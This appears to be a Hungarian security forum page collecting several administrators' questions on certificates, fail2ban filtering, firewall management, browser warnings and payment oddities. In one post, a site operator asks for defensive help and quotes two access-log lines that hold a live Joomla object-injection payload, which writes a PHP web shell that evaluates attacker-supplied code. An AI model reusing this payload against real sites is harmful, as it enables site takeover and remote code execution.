Security-all

Sziasztok!

Szeretnék egy letsencrypt tanúsítványt létrehozni egy webmail-hez, de egyelőre bénázok.
Így próbáltam:

letsencrypt-auto certonly --standalone -d webmail.domain.hu

A kliens erre panaszkodik:

Domain: webmail.domain.hu
Type: unauthorized
Detail: Incorrect validation certificate for TLS-SNI-01 challenge. Requested 99fc721418f5c6b95539f64d192e6d65.fd978977e90e35617a51b6f7ac1d5ac0.acme.invalid from 1.2.3.4:443. Received certif
icate containing ''

To fix these errors, please make sure that your domain name was entered correctly and the DNS A record(s) for that domain contain(s) the right IP address.

Az ip elvileg jól oldódik fel, bár nem tudom az bekavarhat-e, hogy a szerver DMZ-ben van, előtte egy Zorp.

Merre keresgéljek?
Köszi!

Sziasztok

Adott egy szerver, rajta sok féle honlap, többek között Wordpress és Joomla. Ezekre nincs közvetlen ráhatásom. Olyanok amilyenek. A frissítés úgy-ahogy kikényszeríthető.
Magas CPU terhelést generálnak, ha megpróbálják feltörni az admint.
Random IP-ről jönnek és nagyon sokan.

A következő fail2ban filtert raktam össze netes ajánlásokból:

cat /etc/fail2ban/filter.d/framework-ddos.conf 
[INCLUDES]
before = common.conf

[Definition]
_daemon = framework-ddos

failregex = .*:(80|443) <HOST> .*POST .*/xmlrpc.php
            .*:(80|443) <HOST> .*POST .*/wp-login.php
            .*:(80|443) <HOST> .*POST /administrator/index.php HTTP
ignoreregex =


jail.conf:
[framework-ddos]

enabled  = true
filter   = framework-ddos
action   = iptables-ddos[name=framework-ddos, port=http, protocol=tcp]
logpath  = /var/log/apache2/other_vhosts_access.log
maxretry = 5
# findtime: 10 mins
findtime = 600
# bantime: 1 week
bantime  = 604800

Szépen működik, de a probléma az, hogy a weboldal tulajok adminban történő matatására is ugrik. Hogyan lehetne tovább javítani, hogy tényleg csak a login próbálkozásokra szűrjön?

Alternatív megoldásnak még az jutott eszembe, hogy mérem az egyes vhostok CPU terhelését és ha elér egy küszöbértéket, error 503-ra irányítom, de nem tudom, hogy mennyire bevett és etikus gyakorlat?

Sziasztok,

Nem akar valaki nekiállni az alábbi ötletemnek? (böngészőbe implementált transzparens és automatikus szövegdoboz titkosítás, szimmetrikus és asszimetrikus módon):

https://hup.hu/cikkek/20161201/minden_amit_az_internetes_adatvedelemrol…

Hello,

Üzemeltetek jópár joomla-s oldalt (nem az enyémek), amit rendszeresen rommá törnek.
Mindenhol a legfrissebb verzió van fent, de tegnapelőtt megint telerajzolták az összes érintett oldal mindenféle php fájlokkal.
iWatch, maldet , auditd megy ezerrel, de ezzel nem akadályozok meg semmit csak látom, hogy mi történik.
A kérdés az lenne, hogy mit tudok még tenni azon kívül hogy read-only-ba raktam az összes oldalt miután ki lett takarítva ?

Az other_vhost.logban ezt látom:


"192.151.150.42" www.xxxx.hu:80 192.168.xx.xx - - [28/Dec/2016:15: 59:53 +0100] "GET / HTTP/1.1" 200 6735 "-" "}__test|O:21:\"JDatabaseDriverMysqli \":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandle rs\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDri verMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_RO OT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST['3 60'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\\ \\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_nam e_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatab aseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd9 "
"192.151.150.42" www.yyyy.hu:80 192.168.xx.xx - - [28/Dec/2016:22 :45:05 +0100] "GET / HTTP/1.1" 503 3038 "-" "}__test|O:21:\"JDatabaseDriverMysql i\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandl ers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDr iverMysql\":0:{}s:8:\"feed_url\";s:239:\"file_put_contents($_SERVER[\"DOCUMENT_R OOT\"].chr(47).\"shootme.php\",\"|=|\\x3C\".chr(63).\"php \\x24mujj=\\x24_POST[' 360'];if(\\x24mujj!=''){\\x24xsser=base64_decode(\\x24_POST['z0']);@eval(\\\"\\\ \\\x24safedg=\\x24xsser;\\\");}\");JFactory::getConfig();exit;\";s:19:\"cache_na me_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JData baseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}~\xd 9"


Köszönöm!

Sziasztok!

Adott egy web szerver, amely szerveren minden weboldal https-en keresztül kell, hogy elérhető legyen.

Soha nem volt dolgom még tanúsítványokkal, ezért utánaolvastam a témának.

Tekintve, hogy nekünk 5 féle aldomain igényli a tanúsítványt, ezért úgy gondolom , hogy a Wildcard domain ellenőrző tanúsítványra (RapidSSL Wildcard vagy Comodo Positive SSL Wildcard) lesz szükségünk, mert az , ha jól olvastam, akkor az adott domain név összes aldomainjét hitelesíti.

A szolgáltatók többsége wildcard ssl tanusítványt 29 000 - 33 0000 ft közötti áron szolgáltat.

Viszont szóba jött egy olyan lehetőség, hogy a letsencrypt.org szolgáltató által igénylünk ingyenesen tanusítványt, ami a fórumok szerint , egyszerű, ingyenes, biztonságos, de arra sajnos sehol nem találtam választ, hogy a free verzió biztosít-e wildcard ssl-t.

A másik dolog, hogy a főnököm meg van róla teljes mértékben bizonyosodva, hogy nem kell a wildcard ssl , hanem minden egyes aldomainhez külön igényel 2 800 Ft/ aldomain áron tanusítványt, így 16 000 Ft-ot spórolunk akkor is, ha nem a letsencrypt.org által szolgáltatott tanúsítványt választjuk.

1. Kérdés: Szerintetek jó megoldás az, hogy nem wildcard ssl, hanem aldomainenkent egy tanusitvanyt igenylunk, egyaltalan kivitelezheto ez?

2. Kérdés: Van esetleg tapasztalatotok a letsencrypt.org szolgáltatóval, vagy a hasonló ingyenes ssl szolgáltatókkal kapcsolatban?

Előre is köszönöm a segítséget!

Sziasztok!

Felmerült az igény kb. 50db iptables központi menedzsmentjére. Eddig kézzel vagy kevésbé jól működő scriptekkel menedzselték őket. Legjobb valamilyen webes gui lenne, ahonnan mind az 50 node-ot lehetne központilag babrálni. Tudtok erre bevált jól működő megoldást? Rövid keresgélést követően az alábbiakat találtam:

Firelet, Elastic Firewall, FirewallBuilde

Esetleg ismeri, használja ezeket valaki? Vagy van jobb ötlet? Esetleg ansible? A gépek jellemzően egy hálózatban vannak, ha ez számít.

Segítségeteket előre is köszönöm! :)

Chrome-hoz van egy "Go Back With Backspace" nevű extension, ami visszaállítja, hogy backspace-szel vissza lehessen menni előző oldalra (kivétel, ha gépelünk). Az új verzió új jogosultságot kér, amiről ezt írja a Google:

"Read and modify all your data": In order to capture backspace on every page, the extension needs to install a little piece of code on each one. It does nothing else with the page, its information, or your typing.

Valaki, aki ért Javascripthez, megnézné, hogy mit is csinál pontosan ez az extension, és mennyire biztonságos megadni a kért jogosultságot? Itt a forráskód: https://chromium.googlesource.com/chromium/extensions-by-google/+/maste…

Üdv!

Az imént rendeltem egy bizonyos oldalról, és a fizetést PayPal-on keresztül szerettem volna kiegyenlíteni.
Az oldalon fizetéskor jelezte, hogy át fog irányítani a PayPal oldlára.
A meglepetés itt ért.
Az eddigi hasonló (más boltok esetében) vásárlásaimnál ilyenkor mindig meg kellett adni az azonosítót + jelszavat.
De nem úgy most.

Hi (nevem). (Honnan tudja ki vagyok? Az oldalon regisztrációkor megadott e-mailből?)
...
...
Pay Now. (gomb)

Gombra kattintva, csipog a telefonom, hogy a fizetés megtörtént.
???

Firefox 46.0.1
Mentett jelszavak nincsenek.
"A következő webhelyekhez való bejelentkezések nem lesznek mentve:" között szerepel a paypal.com

A gondom az, hogy céges gép, szóval esetleg más is bejelentkezhet rá. (bár nem valószínű)
De azért ez engem mégis zavar.

Más is találkozott már hasonlóval?

( vagy én fizettem túl régen, és azóta arcfelismerővel is azonosít az oldal? valami rejtett kamerával, mert én nem tudok róla, hogy volna a gépen)

dombi1976

Sziasztok,

Azt hiszem a cím magáért beszél, vitaindítóul:

- Engedi a cégetek, hogy a saját tulajdonotokba levő eszközt használhassátok a céges infrastruktúrában?
- Szeparált hálózatba kerül, vagy a céges eszközökkel megegyező jogosultságú tagja lesz a hálózatnak?
- Milyen technikai, jogi, adminisztrációs és egyéb feltételekhez kötött?

Üdv,
Tassadar

Ezt irja ki már tegnap óta az Amazon oldala helyett a Chromium:

Your connection is not private

Attackers might be trying to steal your information from www.amazon.com (for example, passwords, messages, or credit cards). NET::ERR_CERTIFICATE_TRANSPARENCY_REQUIRED
Automatically report details of possible security incidents to Google. Privacy policy
ReloadHIDE ADVANCED
www.amazon.com normally uses encryption to protect your information. When Chromium tried to connect to www.amazon.com this time, the website sent back unusual and incorrect credentials. This may happen when an attacker is trying to pretend to be www.amazon.com, or a Wi-Fi sign-in screen has interrupted the connection. Your information is still secure because Chromium stopped the connection before any data was exchanged.

You cannot visit www.amazon.com right now because the website uses HSTS. Network errors and attacks are usually temporary, so this page will probably work later.

Van valami gond az Amazonnál vagy csak hülye a Chromium?